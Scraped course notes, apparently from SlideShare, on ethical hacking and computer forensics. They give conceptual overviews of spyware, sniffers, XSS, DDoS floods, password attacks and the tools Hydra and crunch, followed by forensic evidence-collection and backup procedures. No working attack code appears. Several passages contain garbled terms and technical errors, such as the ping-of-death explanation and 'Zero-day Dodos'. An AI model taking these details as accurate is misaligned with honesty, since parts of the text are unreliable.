39 Typically a spyware tool is in a host.exe file or a utility file. If a victim download and execute an infected .exe file. Then spyware become active on the victim system. d. Sniffers: Sniffers are originally developed as a tool for debugging or troubleshooting as a network problem. The Ethernet based sniffer works with sniffer based data card to capture and safe the data packets send across the network. Sniffer can turn out to be quiet dangerous if an another manage to install a sniffer on your system or the router of the network, all the information including password, company business, etc. will lost. 6. Explain Input validation attacks in detail? Input validation attack is any malicious against a computer system that involves manually entering strange information into a normal user input field. Input validation attack takes place when an attacker purposefully enters information into a system or application with the intension of break system functionality. Types of input validation attack:  Buffer Overflow Attack: It sends too much information for a system to process. Network or computer stop responding and access information to tack a memory. Example: Stack Overflow, format string overflow  Canonicalization: It takes place when someone change file directory path. This attacks targets pages that use template files or referencing alternate files on web server. The basic form of this attack is to move
40 outside of web document rules. In order to access the system file, this type of functionality is accident from URL and is not limited to any one programming language or web server. Changing a file directory path, that is a digital permission access to parts of a computer in order to allow access to malicious path is to steel sensitive information or make unapproved changes.  Cross site Scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website which contains a valid URL with a dangerous script embedded an unsuspective visitor might trust they are on and the user is not having an idea side contains a malicious activity. 7. Analyze different DDoS Attack types? A Distributed Denial of Service (DDoS) attack is an attempt to make an online service or a website unavailable by overloading it with huge floods of traffic generated from multiple sources. DDoS attacks can be broadly categorized into three categories:  Volume-based Attacks  Protocol Attacks  Application Layer Attacks a. Volume-based Attacks: Volume-based attacks include TCP floods, UDP floods, ICMP floods, and other spoofed packet floods. These are also called Layer 3 & 4 Attacks. Here, an attacker tries to saturate the bandwidth of the target site. The attack magnitude is measured in Bits per Second (bps). i. UDP Flood: A UDP flood is used to flood random ports on a remote host with numerous UDP packets, more specifically port
41 number 53. Specialized firewalls can be used to filter out or block malicious UDP packets. ii. ICMP Flood: This is similar to UDP flood and used to flood a remote host with numerous ICMP Echo Requests. This type of attack can consume both outgoing and incoming bandwidth and a high volume of ping requests will result in overall system slowdown. iii. HTTP Flood: The attacker sends HTTP GET and POST requests to a targeted web server in a large volume which cannot be handled by the server and leads to denial of additional connections from legitimate clients. iv. Amplification Attack: The attacker makes a request that generates a large response which includes DNS requests for large TXT records and HTTP GET requests for large files like images, PDFs, or any other data files. b. Protocol Attacks: Protocol attacks include SYN floods, Ping of Death, fragmented packet attacks, Smurf DDoS, etc. This type of attack consumes actual server resources and other resources like firewalls and load balancers. The attack magnitude is measured in Packets per Second. i. DNS flood: DNS floods are used for attacking both the infrastructure and a DNS application to overwhelm a target system and consume all its available network bandwidth. ii. SYN Flood: The attacker sends TCP connection requests faster than the targeted machine can process them, causing network saturation. Administrators can tweak TCP stacks to mitigate the effect of SYN floods.
42 iii. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as a Mac limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash. c. Application Layer Attacks: Application Layer Attacks include Slowworms, Zero-day Dodos attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Here the goal is to crash the web server. The attack magnitude is measured in Requests per Second. i. Application Attack: This is also called Layer 7 Attack, where the attacker makes excessive log-in, database-lookup, or search requests to overload the application. It is really difficult to detect Layer 7 attacks because they resemble legitimate website traffic. ii. NTP Amplification: The attacker exploits publically-accessible Network Time Protocol (NTP) servers to overwhelm the targeted server with User Datagram Protocol (UDP) traffic. 8. How ‘crunch’ and ‘Hydra’ related to ethical hacking? Hydra has a very complex syntax for attacking web applications. So, let's just go and see the syntax first. This is the program which we are using to launch the attack. Hydra comes pre-installed in all versions of kali. So, you don’t need to do anything fancy. Just launch it from the command line by typing hydra.
43 Crunch is a wordlist generator where you can specify a standard character set or a character set. Crunch can generate all possible combinations and permutations. This tool comes bundled with the Kali distribution of Linux. 9. What is ‘XSS’? Cross site Scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website which contains a valid URL with a dangerous script embedded an unsuspective visitor might trust they are on and the user is not having an idea side contains a malicious activity. In other words, XSS enables attackers to inject client-side scripts into web pages by exploiting vulnerabilities in dynamically generated web pages. An attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application and cause various damages including data theft, session hijacking, redirecting the web page to another website, etc. XSS attack is always to execute malicious JavaScript in the victim's browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:  Persistent XSS, where the malicious string originates from the website's database.  Reflected XSS, where the malicious string originates from the victim's request.  DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
44  Reflected XSS: Here the attacker will send a script as an input, and the attacker's contents will be reflected back to the victim. He can craft malicious scripts to get session cookies, redirect to a malicious web page, inject data, execute system commands and much more. Stored XSS: This attack can be considered riskier and it provides more damage. In this type of attack, the malicious code or script is being saved on the web server (for example, in the database) and executed every time when the users will call the appropriate functionality. This way stored XSS attack can affect many users. Also as the script is being stored on the web server, it will affect the website for a longer time. DOM-based XXS: This type of attack occurs when the DOM environment is being changed, but the client-side code does not change. When the DOM environment is being modified in the victim’s browser, then the client side code executes differently. 10. Explain the methods of password hacking? One should always take care to have strong password to defend their accounts from potential hackers. A strong password has a following attributes:  Contains at least 8 characters.
45  A mix of letter, number and special character.  A combination of following attributes: I. Small and capital letter.  Dictionary attack: In this attack, the attacker uses a predefined list of words from dictionary and guesses the password. If the set password is weak then a dictionary attack can decode fast.  Hybrid dictionary attack: It uses a set of dictionary words, combined with extensions. Crunch is a word list generator where you can specific a standard character set. Crunch can generate all possible combinations and permutation of words.  Brute force attack: In brute force attack, the hacker uses all possible combination of letters, numbers, special characters and small and capital letter to break password. This type of attack has a high probability of success but it requires an AENORMOUS time to process all the combinations.  Phishing Attack: There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log in page associated with whatever service it is the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go use it for their own purpose.
46

More Related Content

PPT
Introduction to computer forensic
Online
 
PPT
iConference Popovsky
Brian Rowe
 
PPTX
How to Build a Successful Incident Response Program
Resilient Systems
 
PDF
180 184
Editor IJARCET
 
PPTX
'Conducing Security Investigations' Webinar 1-17-2012
SkylerWeisenburger
 
PDF
Chfi V3 Module 01 Computer Forensics In Todays World
gueste0d962
 
PPTX
Purple Teaming - The Collaborative Future of Penetration Testing
FRSecure
 
PPT
Computer forensics
Lalit Garg
 
Introduction to computer forensic
Online
 
iConference Popovsky
Brian Rowe
 
How to Build a Successful Incident Response Program
Resilient Systems
 
180 184
Editor IJARCET
 
'Conducing Security Investigations' Webinar 1-17-2012
SkylerWeisenburger
 
Chfi V3 Module 01 Computer Forensics In Todays World
gueste0d962
 
Purple Teaming - The Collaborative Future of Penetration Testing
FRSecure
 
Computer forensics
Lalit Garg
 

What's hot (19)

PPT
After the Breach
Gary Wilhelm
 
PPTX
Digital forensics
Vidoushi B-Somrah
 
PDF
Codec Networks Providing Courses in Cyber forensic,Network Forensics.
cnetworks
 
PPTX
Slide Deck – Session 2 – FRSecure CISSP Mentor Program 2017
FRSecure
 
PPTX
Slide Deck – Session 3 – FRSecure CISSP Mentor Program 2017
FRSecure
 
PPTX
Network and computer forensics
Johnson Ubah
 
PPTX
Behind The Firewall In-House E Disco Final
J. David Morris
 
PPSX
Everything you need to implement a data forensics program
Caveon Test Security
 
PPTX
Slide Deck – Session 4 – FRSecure CISSP Mentor Program 2017
FRSecure
 
PDF
Focusing on the Threats to the Detriment of the Vulnerabilities
Roger Johnston
 
PPTX
Case study on Physical devices used in Computer forensics.
Vishal Tandel
 
PPTX
Understanding advanced persistent threats (APT)
Dan Morrill
 
PPTX
Slide Deck – Class Session 1 – FRSecure CISSP Mentor Program
FRSecure
 
PPTX
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
FRSecure
 
PDF
6528 opensource intelligence as the new introduction in the graduate cybersec...
Damir Delija
 
PPTX
Computer forensic
Shashi Mishra
 
PDF
12-19-14 CLE for South (P Garrett)
Patrick Garrett
 
PPTX
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
Clare Nelson, CISSP, CIPP-E
 
PDF
Slide Deck - CISSP Mentor Program Class Session 1
FRSecure
 
After the Breach
Gary Wilhelm
 
Digital forensics
Vidoushi B-Somrah
 
Codec Networks Providing Courses in Cyber forensic,Network Forensics.
cnetworks
 
Slide Deck – Session 2 – FRSecure CISSP Mentor Program 2017
FRSecure
 
Slide Deck – Session 3 – FRSecure CISSP Mentor Program 2017
FRSecure
 
Network and computer forensics
Johnson Ubah
 
Behind The Firewall In-House E Disco Final
J. David Morris
 
Everything you need to implement a data forensics program
Caveon Test Security
 
Slide Deck – Session 4 – FRSecure CISSP Mentor Program 2017
FRSecure
 
Focusing on the Threats to the Detriment of the Vulnerabilities
Roger Johnston
 
Case study on Physical devices used in Computer forensics.
Vishal Tandel
 
Understanding advanced persistent threats (APT)
Dan Morrill
 
Slide Deck – Class Session 1 – FRSecure CISSP Mentor Program
FRSecure
 
Slide Deck – Session 12 – FRSecure CISSP Mentor Program 2017
FRSecure
 
6528 opensource intelligence as the new introduction in the graduate cybersec...
Damir Delija
 
Computer forensic
Shashi Mishra
 
12-19-14 CLE for South (P Garrett)
Patrick Garrett
 
The Inmates Are Running the Asylum: Why Some Multi-Factor Authentication Tech...
Clare Nelson, CISSP, CIPP-E
 
Slide Deck - CISSP Mentor Program Class Session 1
FRSecure
 

Similar to Ethical Hacking And Computer Forensics (20)

PPTX
Cyber
PuttaRahul
 
PPTX
Introduction to computer forensics in IT society
norhasiahakhir1
 
PPT
Cyber forensics
pranjal dutta
 
PPTX
Cyber forensic-Evedidence collection tools
N.Jagadish Kumar
 
PPT
computer forensics, involves the preservation, identification, extraction, an...
pable2
 
PDF
A Review on Recovering and Examining Computer Forensic Evidences
BRNSSPublicationHubI
 
PPTX
Chapter 3 cmp forensic
shahhardik27
 
PDF
Cyber forensics and auditing
Sweta Kumari Barnwal
 
PPTX
Computer Forensics ppt
OECLIB Odisha Electronics Control Library
 
PPT
Lecture 9 and 10 comp forensics 09 10-18 file system
Alchemist095
 
PPTX
unit 5 understanding computer forensics.pptx
Dimple Relekar
 
PPTX
computer-forensics-8727-OHvDvOm.pptx
DaniyaHuzaifa
 
PPTX
computer-forensics-8727-OHvDvOm.pptx
ssuser2bf502
 
PDF
Daniel_CISSP_Dom7__1_.pdf
Alejandro Daricz
 
PPT
L11 - Intro to Computer Forensics.ppt
RebeccaMunasheChimhe
 
PPTX
Business Intelligence (BI) Tools For Computer Forensic
Dhiren Gala
 
PPT
CS426_forensics.ppt
PrabithGupta1
 
PPT
Network Forensics Basic lecture for Everyone
BurhanKhan774154
 
PPT
CS426_forensics_tools to analyse and deve
vikashagarwal874473
 
PPT
CS426_forensics.ppt
OkviNugroho1
 
Cyber
PuttaRahul
 
Introduction to computer forensics in IT society
norhasiahakhir1
 
Cyber forensics
pranjal dutta
 
Cyber forensic-Evedidence collection tools
N.Jagadish Kumar
 
computer forensics, involves the preservation, identification, extraction, an...
pable2
 
A Review on Recovering and Examining Computer Forensic Evidences
BRNSSPublicationHubI
 
Chapter 3 cmp forensic
shahhardik27
 
Cyber forensics and auditing
Sweta Kumari Barnwal
 
Computer Forensics ppt
OECLIB Odisha Electronics Control Library
 
Lecture 9 and 10 comp forensics 09 10-18 file system
Alchemist095
 
unit 5 understanding computer forensics.pptx
Dimple Relekar
 
computer-forensics-8727-OHvDvOm.pptx
DaniyaHuzaifa
 
computer-forensics-8727-OHvDvOm.pptx
ssuser2bf502
 
Daniel_CISSP_Dom7__1_.pdf
Alejandro Daricz
 
L11 - Intro to Computer Forensics.ppt
RebeccaMunasheChimhe
 
Business Intelligence (BI) Tools For Computer Forensic
Dhiren Gala
 
CS426_forensics.ppt
PrabithGupta1
 
Network Forensics Basic lecture for Everyone
BurhanKhan774154
 
CS426_forensics_tools to analyse and deve
vikashagarwal874473
 
CS426_forensics.ppt
OkviNugroho1
 

Recently uploaded (20)

PPTX
Lecture Notes Electrical Wiring System Components
eedgecbhojpur
 
PPTX
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx
MehrabTaseenTalukder
 
PPT
introduction to datamining and warehousing
ssuser4ab3a2
 
PPTX
CH1 Production IntroductoryConcepts.pptx
RacemMellouli1
 
PPTX
Artificial Intelligence
dikshendrasarpate2
 
PPTX
Foundation to blockchain - A guide to Blockchain Tech
Davies Chacko
 
PPTX
CYBER-CRIMES AND SECURITY A guide to understanding
Davies Chacko
 
PDF
July 2025 - Top 10 Read Articles in International Journal of Software Enginee...
sebastianku31
 
PPT
Mechanical Engineering MATERIALS Selection
arsalanahmad705384
 
PPTX
OOP with Java - Java Introduction (Basics)
Rashmi T V
 
PPTX
Current and future trends in Computer Vision.pptx
Subramanyam Natarajan
 
PPT
Introduction, IoT Design Methodology, Case Study on IoT System for Weather Mo...
MariaRufina4
 
PDF
Digital Logic Computer Design lecture notes
CHINNASUNKAIAH1
 
PDF
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
jpsjournal1
 
PPTX
additive manufacturing of ss316l using mig welding
premcdr7799
 
PPTX
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
VinayB68
 
PPTX
FINAL REVIEW FOR COPD DIANOSIS FOR PULMONARY DISEASE.pptx
rubeshbme
 
PDF
composite construction of structures.pdf
AinieButt1
 
PPTX
web development for engineering and engineering
keshriji700
 
PPTX
Internet of Things (IOT) - A guide to understanding
Davies Chacko
 
Lecture Notes Electrical Wiring System Components
eedgecbhojpur
 
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx
MehrabTaseenTalukder
 
introduction to datamining and warehousing
ssuser4ab3a2
 
CH1 Production IntroductoryConcepts.pptx
RacemMellouli1
 
Artificial Intelligence
dikshendrasarpate2
 
Foundation to blockchain - A guide to Blockchain Tech
Davies Chacko
 
CYBER-CRIMES AND SECURITY A guide to understanding
Davies Chacko
 
July 2025 - Top 10 Read Articles in International Journal of Software Enginee...
sebastianku31
 
Mechanical Engineering MATERIALS Selection
arsalanahmad705384
 
OOP with Java - Java Introduction (Basics)
Rashmi T V
 
Current and future trends in Computer Vision.pptx
Subramanyam Natarajan
 
Introduction, IoT Design Methodology, Case Study on IoT System for Weather Mo...
MariaRufina4
 
Digital Logic Computer Design lecture notes
CHINNASUNKAIAH1
 
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
jpsjournal1
 
additive manufacturing of ss316l using mig welding
premcdr7799
 
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
VinayB68
 
FINAL REVIEW FOR COPD DIANOSIS FOR PULMONARY DISEASE.pptx
rubeshbme
 
composite construction of structures.pdf
AinieButt1
 
web development for engineering and engineering
keshriji700
 
Internet of Things (IOT) - A guide to understanding
Davies Chacko
 

Ethical Hacking And Computer Forensics

  • 1. 1 Computer Forensics Part A 1. What is the role of artifacts in computer forensics? There is almost always something left behind by the attacker—be it code programs, running processes, or sniffer log files. These are known as artifacts. Never attempt to analyze an artifact on the compromised system. Artifacts are capable of anything, and you want to make sure their effects are controlled. 2. Give a brief idea about volatile evidences? Always try to collect the most volatile evidence. An example an order of volatility would be:  Registers and cache  Routing tables  Arp cache  Process table  5. Kernel statistics and modules  6. Main memory  7. Temporary file systems  8. Secondary memory  9. Router configuration  10. Network topology
  • 2. 2 3. Describe in detail the services offered by computer forensics? There are many services offered by computer forensic are following:  Forensic incident response  Evidence collection  Forensic analysis  Expert witness  Forensic litigation and insurance claims support  Training  Forensic process improvement i. Forensic incident response: forensics and incident response is an important part of business and law enforcement operations. ii. Evidence collection :- It having Memory dump, network status, process dump, other system information, disk images and forensic analysis done on the images not on the original disk. iii. Forensic analysis: Forensic analysis is a term for in-depth analysis, investigation whose purpose is to objectively identify and document the culprits, reasons, course and consequences of a security incident or violation of state laws or rules of the organization. iv. Expert witness: An expert witness, particularly in common law countries such as the United Kingdom, Australia, and the United States, is a person whose opinion by virtue of education, training, certification, skills or experience, is accepted by the judge as an expert. v. Forensic process improvement: The purpose of this part of the chapter is to introduce the reader to a process that will enable a
  • 3. 3 system administrator or information security analyst to determine the threat against their systems and networks. 4. What are the rules for evidence collection? There are five rules of collecting electronic evidence. These relate to five properties that evidence must have to be useful.  Admissible  Authentic  Complete  Reliable  Believable a. Admissible: Admissible is the most basic rule. The evidence must be able to be used in court or otherwise. Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except the cost is higher. b. Authentic: If you can’t tie the evidence positively to the incident, you can’t use it to prove anything. c. Complete: It’s not enough to collect evidence that just shows one perspective of the incident. d. Reliable: The evidence you collect must be reliable. Your evidence collection and analysis procedures must not cast doubt on the evidence’s authenticity and veracity. e. Believable: The evidence you present should be clearly understandable and believable to a jury.
  • 4. 4 5. What is internet Security hierarchy? Information such as trade secrets, vault and authorization codes, and lock and key information are clearly of a mission critical nature, and their unintended disclosure could cause severe loss to a business or operation. Fig: Internet security hierarchy 6. What are the different types of evidences? a. Testimonial Evidence: Testimonial evidence is any evidence supplied by a witness. This type of evidence is subject to the perceived reliability of the witness, but as long as the witness can be considered reliable, testimonial evidence can be almost as powerful as real evidence. mission critical departmental private Company private public information
  • 5. 5 b. Hearsay: Hearsay is any evidence presented by a person who was not a direct witness. Word processor documents written by someone without direct knowledge of the incident are hearsay. Hearsay is generally inadmissible in court and should be avoided. c. Real Evidence: Real Evidence is any evidence that speaks for itself without relying on anything else. In electronic terms, this can be a log produced by an audit function—provided that the log can be shown to be free from contamination. 7. Discuss the role of artifacts in computer forensics? There is almost always something left behind by the attacker—be it code programs, running processes, or sniffer log files. These are known as artifacts. Never attempt to analyze an artifact on the compromised system. Artifacts are capable of anything, and you want to make sure their effects are controlled. 8. Compare spyware and Adware? Spyware: Spyware is computer software which is installed surreptitiously on a personal computer; it takes partial control over the user’s computer, without the user’s informed consent. Adware: Adware is any software package which automatically plays, displays, or downloads advertisements to a computer after the software is installed on it or while the application is being used.
  • 6. 6 Both are independent programs that can be automatically installed when you surf the internet or when you installed free software. Most adware is a spyware in a different sense than “advertising supported software,” for a different reason: it displays advertisements related to what it finds from spying on you. 9. What are the different steps in evidence collection?  Find the evidence.  Find the relevant data.  Create an order of volatility.  Remove external avenues of change.  Collect the evidence.  Document everything. a. Find the Evidence: Determine where the evidence you are looking for is stored. Use a checklist. Not only does it help you to collect evidence, but it also can be used to double-check that everything you are looking for is there. b. Find the Relevant Data: Once you’ve found the evidence, you must figure out what part of it is relevant to the case. In general, you should err on the side of over-collection, but you must remember that you have to work fast. Don’t spend hours collecting information that is obviously useless. c. Create an Order of Volatility: You know exactly what to gather, work out the best order in which to gather it. The order of volatility for your system is a good guide and ensures that you minimize loss of uncorrupted evidence.
  • 7. 7 d. Remove External Avenues of Change: It is essential that you avoid alterations to the original data, and prevention is always better than a cure. Preventing anyone from tampering with the evidence helps you create as exact an image as possible. e. Collect the Evidence: You can now start to collect the evidence using the appropriate tools for the job. Reevaluate the evidence you’ve already collected. You may find that you missed something important. Now is the time to make sure you get it. f. Document Everything: Your collection procedures may be questioned later, so it is important that you document everything you do. Timestamps, digital signatures, and signed statements are all important. Don’t leave anything out.
  • 8. 8 Part B 1. Explain the types of computer Forensics Systems?  Data duplication and preservation  Data recovery  Document searches  Media conversion  Expert witness services  Computer evidence service options  Other miscellaneous services a. Data Seizure Computer forensics experts, following federal guidelines, should act as this representative, using their knowledge of data storage technologies to track down evidence. Experts should also be able to assist during the equipment seizure process. b. Data Duplication and Preservation When one party must seize data from another, two concerns must be addressed:  the data must not be altered in any way  the seizure must not put an undue burden on the responding party. Computer forensics experts should acknowledge both of these concerns by making an exact duplicate of the needed data. When experts work on the duplicated data, the integrity of the original data is maintained. c. Data Recovery
  • 9. 9 Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Using proprietary tools, computer forensics experts should be able to safely recover and analyze otherwise inaccessible evidence. The ability to recover lost evidence is made possible by the expert’s advanced understanding of storage technologies. d. Document Searches Computer forensics experts should also be able to search over 200,000 electronic documents in seconds rather than hours. The speed and efficiency of these searches make the discovery process less complicated and less intrusive to all parties involved. e. Media Conversion Computer forensics experts should extract the relevant data from these devices, convert it into readable formats, and place it onto new storage media for analysis. f. Expert Witness Services Computer forensics experts should be able to explain complex technical processes in an easy-to-understand fashion. This should help judges and juries comprehend how computer evidence is found, what it consists of, and how it is relevant to a specific situation. g. Computer Evidence Service Options Computer forensics experts should offer various levels of service, each designed to suit your individual investigative needs.  Standard service
  • 10. 10  On-Site service  Emergency service  Priority service  Weekend service i. Standard Services Computer forensics experts should be able to work on your case during normal business hours until the critical electronic evidence is found. . ii. On-Site Service Computer forensics experts should be able to travel to their location to perform complete computer evidence services. While on-site, the experts should quickly be able to produce exact duplicates of the data storage media in question. iii. Emergency Service Your computer forensics experts should be able to give your case the highest priority in their laboratories. They should be able to work on it without interruption until your evidence objectives are met. iv. Priority Service Dedicated computer forensics experts should be able to work during normal business hours (8:00 A.M. to 5:00 P.M., Monday through Friday) until the evidence is found. Priority service typically cuts your turnaround time in half. v. Weekend Service Computer forensics experts should be able to work from 8:00 A.M. to 5:00 P.M., Saturday and Sunday, to locate the needed electronic evidence and
  • 11. 11 will continue working on your case until your evidence objectives are met. Weekend service depends on the availability of computer forensics experts. h. Other Miscellaneous Services Computer forensics experts should also be able to provide extended services. These services include:  Analysis of computers and data in criminal investigations  On-site seizure of computer data in criminal investigations  Analysis of computers and data in civil litigation.  On-site seizure of computer data in civil litigation  Analysis of company computers to determine employee activity  Assistance in preparing electronic discovery requests  Reporting in a comprehensive and readily understandable manner  Court-recognized computer expert witness testimony  Computer forensics on both PC and Mac platforms  Fast turnaround time. 2. Explain data recovery process? Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten or to recover entire hard drives that have been physically damaged. Data Back-up and Recovery  Back-up Obstacles
  • 12. 12 The following are obstacles to backing up applications:  Backup window  Network bandwidth  System throughput  Lack of resources i. Back-up Windows: The backup window is the period of time when backups can be run. The backup window is generally timed to occur during nonproduction periods when network bandwidth and CPU utilization are low. ii. Network Bandwidth: If a network cannot handle the impact of transporting hundreds of gigabytes of data over a short period of time, the organization’s centralized backup strategy is not viable. iii. System throughput: Three I/O bottlenecks are commonly found in traditional backup schemes. These are: 1. The ability of the system being backed up to push data to the backup server. 2. The ability of the backup server to accept data from multiple systems simultaneously. 3. The available throughput of the tape device(s) onto which the data is moved. iv. Lack of Resources: Many companies fail to make appropriate investments in data protection until it is too late. b. The Future of Data Back-up Successful data backup and recovery is composed of four key elements: the backup server, the network, the backup window, and the backup storage device.
  • 13. 13 a. The Back-up Server: The backup server is responsible for managing the policies, schedules, media catalogs, and indexes associated with the systems it is configured to back up. The systems being backed up are called clients. The overall performance of a backup or recovery was directly related to the ability of the backup server to handle the I/O load created by the backup process. The tape servers that allow administrators to divide the backup tasks across multiple systems while maintaining scheduling and administrative processes on a primary or backup server. This approach often involves attaching multiple tape servers to a shared tape library, which reduces the overall cost of the system. The newest backup architecture implements a server less backup solution that allows data to be moved directly from disk to tape, bypassing the backup server altogether. This method of data backup removes the bottleneck of the backup server completely. However, the performance of server less backup is then affected by another potential bottleneck—bandwidth. b. The Network Data Path: Centralization of a data-management process such as backup and recovery requires a robust and available network data path. The movement and management of hundreds or thousands of megabytes of data can put a strain on even the best-designed networks. An enterprise class backup solution can distribute backup services directly to the data source, while at the same time centralizing the administration of these resources.
  • 14. 14 c. The Back-up Window: A backup window defines how much time is available to back up the network. Time plays an important role in choosing how much server, network, and resource support needs to be deployed.  Incremental Back-up: Incremental backups only transfer data that has changed since the last backup. On average, no more than 5% of data in a file server changes daily. That means an incremental backup may only require 5% of the time it takes to back up the entire file system.  Block-Level Incremental Back-up: Rather than backing up entire files that have been modified since the last backup, only the blocks that have changed since the last backup are marked for backup.  Image Back-up: This type of backup creates copies, or snapshots, of a file system at a particular point in time. Image backups are much faster than incremental backups and provide the ability to easily perform a bare bones recovery of a server without loading the operating systems, applications, and the like.  Data Achieving: Removing infrequently accessed data from a disk drive can reduce the size of a scheduled backup by up to 80%.  Back-up Storage Device: the single most expensive item in a backup project is the backup storage device itself. Determining the tape format, number of tape drives, and how many slots are required is predicated on many variables. Backup windows, growth rates, retention policies, duplicate tape copies, and network and server throughputs all affect which backup storage device is best for your needs.  Recommended Back-up Features:
  • 15. 15 1. Data Interleaving: To back up multiple systems concurrently, the backup application must be able to write data from multiple clients to tape in an interleaved manner. 2. Remote Back-up: Many remote systems are exposed to unrecoverable data loss. 3. Global Monitoring: A robust backup application should be able to support reporting and administration of any backup system, regardless of location. 4. Performance: An enterprise backup application should be able to benchmark backup data rates exceeding one terabyte per hour. 3. What are the different computer Forensic system technologies? a. Types of military computer forensics technology  Key objectives of cyber forensics include rapid discovery of evidence, estimation of potential impact of the malicious activity on the victim, and assessment of the intent and identity of the perpetrator.  Real-time tracking of potentially malicious activity Is especially difficult when the pertinent information has been intentionally hidden, destroyed, or modified in order to elude discovery.  National Law Enforcement and Corrections Technology Center (NLECTC) work with criminal justice professionals to identify urgent and emerging technology needs.  NLECTC centers demonstrate technologies, test commercially available technologies and publish results linking research and practice.. Computer forensic experiment-2000 (cfx-2000)  CFX-2000 is an integrated forensic analysis framework.
  • 16. 16  The central hypothesis of CFX-2000 is that it is possible to accurately determine the motives, intent, targets, sophistication, identity, and location of cyber criminals and cyber terrorists by deploying an integrated forensic analysis framework.  The cyber forensic tools involved in CFX-2000 consisted of commercial off-the-shelf software and directorate-sponsored R&D prototypes. CFX includes Sl-Fl integration environment.  The Synthesizing Information from Forensics Investigations (SI-FI) integration environment supports the collection, examination, and analysis processes employed during a cyber-forensic investigation.  The SI-FI prototype uses digital evidence bags (DEBS), which are secure and tamperproof containers used to store digital evidence. V Investigators can seal evidence in the DEBS and use the Sl-FI implementation to collaborate on complex investigations. b. Types of law enforcement computer forensics technology  Computer forensics tools and techniques have become important resources for use in internal investigations, civil lawsuits, and computer security risk management Law enforcement and military agencies have been involved in processing computer evidence for years. Computer Evidence Processing Procedures Processing procedures and methodologies should conform to federal computer evidence processing standards.
  • 17. 17  Preservation of Evidence: Computer evidence is fragile and susceptible to alteration or erasure by any number of occurrences. i. Trojan horse Programs: The computer experts should be able to demonstrate his or her ability to avoid destructive programs and traps that can be planted by computer users bent on destroying data and evidence. Such programs can also be used to covertly capture sensitive information, passwords, and network logons. ii. Computer Forensics Documentation: without proper documentation, it is difficult to present findings. If the security or audit findings become the object of a lawsuit or a criminal investigation, then documentation becomes even more important. iii. File Slack: Techniques and automated tools that are used to capture and evaluate file slack should be demonstrated in a training course. iv. Data Hiding Techniques: The participants should be able to demonstrate their ability to deal with slack and should demonstrate proficiency in searching file slack, documenting their findings, and eliminating the security risk. v. E-commerce Investigations: a. Net Three Analyzer: can be used to identify past Internet browsing and email activity done through specific computers. b. Dual Purpose Programs: Programs can be designed to perform multiple processes and tasks at the same time.
  • 18. 18 c. Text Search Techniques: Tools that can be used to find targeted strings of text in files, file slack, unallocated file space, and Windows swap files.  Data Structure: Participants should be able to leave a training course with a good understanding of how computer hard disks and floppy diskettes are structured and how computer evidence can reside at various levels within the structure of the disk.  Data Encryption: A computer forensics course should cover, in general, how data is encrypted; it should also illustrate the differences between good encryption and bad encryption.  Matching a Diskette to a computer: specialized techniques and tools that make it possible to conclusively tie a diskette to a computer that was used to create or edit files stored on it.  Data Compression: The participant should be shown how compression works and how compression programs can be used to hide and disguise sensitive data.  Erased files: The training participant should be shown how previously erased files can be recovered by using DOS programs and by manually using data-recovery techniques.  Internet Abuse Identification and Detection: This process will focus on computer forensics issues tied to data that the computer user probably doesn’t realize exists (file slack, unallocated file space, and Windows swap files).  The Boot Process and Memory Resident Programs: The participant should be able to take part in a graphic demonstration of how the operating system can be modified to change data and destroy data at the whim of the person who configured the system. c. Types of Business Computer Forensics Technology
  • 19. 19 Remote Monitoring of Target Computer: Data Interception by Remote Transmission (DIRT) from Codex Data Systems (CDS), Inc. [7] is a powerful remote control monitoring tool that allows stealth monitoring of all activity on one or more target computers simultaneously from a  Remote command center.  Creating trackable electronic documents:  Theft recovery software for laptops and PCs: What Is the Real Cost of a Stolen Laptop or PC? i. The price of the replacement hardware. ii. The price of replacing the software. iii. The cost of lost production time or instruction time. iv. The loss of customer goodwill (lost faxes, delayed correspondence or billings, problems answering questions and accessing data). v. The cost of reporting and investigating the theft, filing police reports and insurance claims. vi. The cost of increased insurance. Basic Forensics Tools and Techniques  Many computer forensics workshops have been created to familiarize investigators and security personnel with the basic techniques and tools necessary for a successful investigation of Internet and computer- related crimes.  Workshop topics normally include: types of computer crime, cyber law basics, tracing email to its source, digital evidence acquisition, cracking passwords, monitoring computers remotely, tracking online activity, finding and recovering hidden and deleted data, locating stolen computers, creating trackable files, identifying software pirates, and so on. Forensics Services Available
  • 20. 20  Lost password and file recovery  Location and retrieval of deleted and hidden files  File and email decryption  Email supervision and authentication  Threatening email traced to source  Identification of Internet activity  Computer usage policy and supervision  Remote PC and network monitoring  Tracking and location of stolen electronic files  Honey pot sting operations  Location and identity of unauthorized software users  Theft recovery software for laptops and PCs  Investigative and security software creation  Protection from hackers and viruses (see sidebar, “Virus/Trojan/Worm Protection”). 4. Describe in detail evidence processing steps? There really are no strict rules that must be followed regarding the processing of computer evidence. The following are general computer forensics steps:  Shut down the computer.  Document the hardware configuration of the system.  Transport the computer system to a secure location.  Make bit stream backups of hard disks and floppy disks.  Mathematically authenticate data on all storage devices.  Document the system date and time.  Make a list of key search words.  Evaluate the Windows swap file.  Evaluate file slack.  Evaluate unallocated space (erased files).
